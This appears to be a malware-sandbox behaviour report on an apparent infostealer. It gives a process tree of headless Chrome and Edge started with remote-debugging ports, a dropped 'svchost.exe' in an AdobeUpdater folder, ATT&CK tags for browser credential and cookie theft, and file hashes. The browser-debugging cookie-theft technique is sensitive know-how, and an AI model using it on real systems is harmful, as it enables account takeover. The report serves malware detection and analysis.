C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4944,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4808 /prefetch:85⤵PID:2692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4628,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4636 /prefetch:15⤵
- Uses browser remote debugging
PID:4448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4992,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4632 /prefetch:15⤵
- Uses browser remote debugging
PID:3164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5060,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5056 /prefetch:15⤵
- Uses browser remote debugging
PID:2968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5264,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5108 /prefetch:85⤵PID:3420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4680,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5064 /prefetch:85⤵PID:868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5196,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5192 /prefetch:85⤵PID:4652
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu4⤵
- Uses browser remote debugging
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7ff97ffdf208,0x7ff97ffdf214,0x7ff97ffdf2205⤵PID:2492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2192,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:25⤵PID:4000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2204,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:35⤵PID:5948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2360,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2352 /prefetch:85⤵PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3356 /prefetch:15⤵
- Uses browser remote debugging
PID:2896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3372,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:15⤵
- Uses browser remote debugging
PID:2932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4592,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:15⤵
- Uses browser remote debugging
PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4708,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4704 /prefetch:15⤵
- Uses browser remote debugging
PID:5624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4896,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4892 /prefetch:85⤵PID:5592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4816,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4900 /prefetch:85⤵PID:4764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5008,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:15⤵
- Uses browser remote debugging
PID:2708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5028,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5044 /prefetch:85⤵PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5752,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5748 /prefetch:15⤵
- Uses browser remote debugging
PID:5620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5804,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5808 /prefetch:85⤵PID:2488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5804,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5808 /prefetch:85⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5988,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:85⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6040,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6036 /prefetch:85⤵
- Modifies registry class
PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6216,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:15⤵
- Uses browser remote debugging
PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5236,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4676 /prefetch:85⤵PID:544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4664,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4676 /prefetch:85⤵PID:1796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6296,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:15⤵
- Uses browser remote debugging
PID:1908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4736,i,2319081846421482187,4647551992472472784,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4700 /prefetch:85⤵PID:6084
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exeC:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5392
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3156
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
938KB
MD52517b502d7714a4e384044a0b6c2a157
SHA1aa974d57b3b42a1a72afbe2520ae7333e35d7531
SHA25666fc943f11f465b81234c1fd1a9dfecb87082fe2560a0b1865c2679a927c76c0
SHA512f3a87225fecced58e540bab65087e45f7340307b77673e566e7074354cf3f4668815ce56bf5f04fc6dba847a0330fc89cc7c8a4ca48d2b725e39a564f4ae46aa
-
Filesize
649B
MD56540b36957e35de8c2e69a3da3505c44
SHA1fef6966be90be8829d203526372d285ce7b243de
SHA256efd8fd2b5390f85942107c0d2fbf76250450861891865ce9dc6a4654df7321b9
SHA51250b15739812a264576819205c8fd316a1cc4c0b466eb089508e807a94ed6325a2c6e1a05a45cf2cd2e284b0d18eb979480d4ed6c423f9dd18f4ea4a38fd25cd2
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
10KB
MD580bb220c47df7852d42545af8a27b982
SHA16286dc16c97098b9663889a3875141e567075345
SHA2565c2a68aa3052f3e41373024baa1bf5e15b2f9792e68a48e5f09535629c831d1d
SHA512e448e74313a578ad0ae450e25db2f4578e1323e4ac39d90e0c8bb45436dc208c5f38650e57bf034d8fba17aeeacf54ed7afeb05534e077f4a074845ac082b912
-
Filesize
10KB
MD59cf5c62344b083867152098c4c21a561
SHA1c336e8a69759c6b6340cd14660fb3b3b93b2e6c0
SHA25629326052b098212fdd590f72d727961512e8dc2ad184c3e59d362113e9cc1c8d
SHA51242deee766450178b397d70e60606db5583a2a58ad52274f68509fc494405fa309af4e0652b185c3003cecdd69d2dc32afce4a19cd14a2443fd6d8195bbdc7c91
-
Filesize
15KB
MD5ca28f5a2df6d510375417ec92eb6c7c0
SHA196577da47423e958a198a6c76a6550591049c13a
SHA2560f327800ac4c8d4afbdc4fc13ff2a2556c02317d7311c5acba7bcb009401b5c7
SHA5120c1e4c4389c51ef88d07581d78f3cde80f4ba88149a4f5cd7e9fd7677e15a9e1b9c7140a009f92bde9eac077636d6fcd2cb46002e8d4f547797302fadcef8981
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD55334e16353068c78a5b42cd97f41d1b4
SHA15421b9643cd6f65ad1cf67f047a0f4fedad8c32c
SHA256331e287ba0a4bccdfbda1ffac975edb20f228ccf4ca880c94711a4cb234ff599
SHA512ec954d0b6044f0e95de96609197f2bc878adc438ead9c255dd1d93cdd1201477d4f62c6b27cc8c57544c29331b80543c9c5a45491df275dffbd7a5fa7615ef79
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d84f.TMP
Filesize48B
MD57e2b6ab4f923b154b8657a3eb38fc174
SHA188c0efe9572c789934f98d98d435a5a31eba5247
SHA256610e9832290e159598e041f9c13c8c87a11de943a51776de02e2706e8d48cd91
SHA5121ed3b12e71c0cee602ed420db6763039fcb2561d413f5e5797eeffecd8cee92feac47929ff4c64079aba8c3b15a38bb0e60aee172475ed0aa137ffc2ee52dc96
-
Filesize
153KB
MD594854d2f934d10fbbac8b972e8662574
SHA13fe1df2868c56ad54ab6cd5a0be67fc62f72828d
SHA2565b936b5dd1f2625d7ae6f76dc9a6069acb5191b84b882dd6d94f06b33bd92dce
SHA51262c525eb9c65f3f23bab0712209e853551f5c1f1b2785553a292a3534b49c4612fef7d8fa10e03c154338cd9d975db7753dee61a1516ca6c3ff014b62a81be8f
-
Filesize
80KB
MD5d8bfe7f445e22f1521d1f54647e13dc3
SHA16521da545f1417fbe10a48472d1bdcd145a13f25
SHA256e843ce1105aba1bfafb61e125c40732f840d11e485fc94dac221e3a358b990e1
SHA512a126acc132b03969ee4861222dad094480c26ef9d1d17435324f2e7c39e9e1771f9277700cef327ae859e491e958b68a6051a8eea14be88d2074e2e373324288
-
Filesize
280B
MD501cc3a42395638ce669dd0d7aba1f929
SHA189aa0871fa8e25b55823dd0db9a028ef46dfbdd8
SHA256d0c6ee43e769188d8a32f782b44cb00052099222be21cbe8bf119469c6612dee
SHA512d3b88e797333416a4bc6c7f7e224ba68362706747e191a1cd8846a080329473b8f1bfebee5e3fe21faa4d24c8a7683041705e995777714330316e9b563d38e41
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD52b66d93c82a06797cdfd9df96a09e74a
SHA15f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA51295e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001
Filesize23B
MD53fd11ff447c1ee23538dc4d9724427a3
SHA11335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA51210a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize176B
MD5c54cc736a77b3c587c92df8c338100b7
SHA1ca595700be05c517db8a0f7e5376c9e3b849d3ed
SHA25637c39761046419a35ac2bc7a03452f19d410aaa3de6dbdb3f99c3a93193f0e79
SHA512de17f42cd54bb58a88ffb58f026f185b70b821d7c58d6bd5a07b3f6875cd379ae7a81dc2472a094c8d5ce4266bf66b93d8f50ec86348b9291d62b355cd61194d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize112B
MD517738688a4bd30a2ac51ba95b3fc8ec1
SHA18f112c4be3f2884284209cd06fa440a8eb2b3795
SHA25618d1bbba589b0bbef987ce701ae9a0ce4c55c309231636b9a966fd85fcdc876b
SHA512062af6531ae74045dc98737cf39c54bc238f23eca0a17df8ae8c339f60442a89769a78ed81613b845ac10254bdc233bac847fde23f57993c5dafaebc22099d2f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe582287.TMP
Filesize119B
MD5887dcd46701f3a6e8b092fba462798e5
SHA1de4b07b4c34f01a12f74d7961b873996a41a212b
SHA2569a1230f21b6ba32aa1fd2073b0bf4364ff1b9b6f786ac2325484c01dcbf0333a
SHA512f11a38e7f21494a84095d363cdd9f30fe449003a168ab92ce60bbbf00d73ce0f5a1470fbcb084c7efe2103554e1dd3028f032ca6bbc0cf20f35e40113e469c36
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
Filesize327B
MD540ba63c9670c5a19be1565487bbce95c
SHA102de95fb2863e8137313177ec3688f15c431f64a
SHA256c8dd18b778cee576e93e510e220ba8be93b6f07e8b9924abeecbe5068a4e45af
SHA512f993feeed450ea9a3db70da8f9a6bf082167a6f6293ac961f05f78e9cc6141cfdb0eacb12cad880e58b1d9331f0902b7d831726c9b505cc4d017f13c4bfc4e36
-
Filesize
22KB
MD5889384be3b728efa1c26177048dea143
SHA14d5a80527fc13c7b06c3ad833c9c9857f66e4fc6
SHA25644d678e87b0bb08813980e4ef714fe25d803ff83fa212a02cd98cc2a4ac5704a
SHA51267eed17def8bf8929c15f19da4bf5dc5a09ced135d04104b1be95ca01f628d45b25f61a4bc8b5ef4d035a787503f66ec5beeb5e2fcb24323958696be08e7586f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d075b208-046c-4828-8eed-0797875a600d.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
40KB
MD536f775fde3b6efc3267e87ff7f322d7f
SHA180791d40bc4edfd9bf0041fde5e3b74e4885ab18
SHA2565852b0c5f2aa563a5298f90679fd4865fcf0e161a5842c548bd92e9abf2254b7
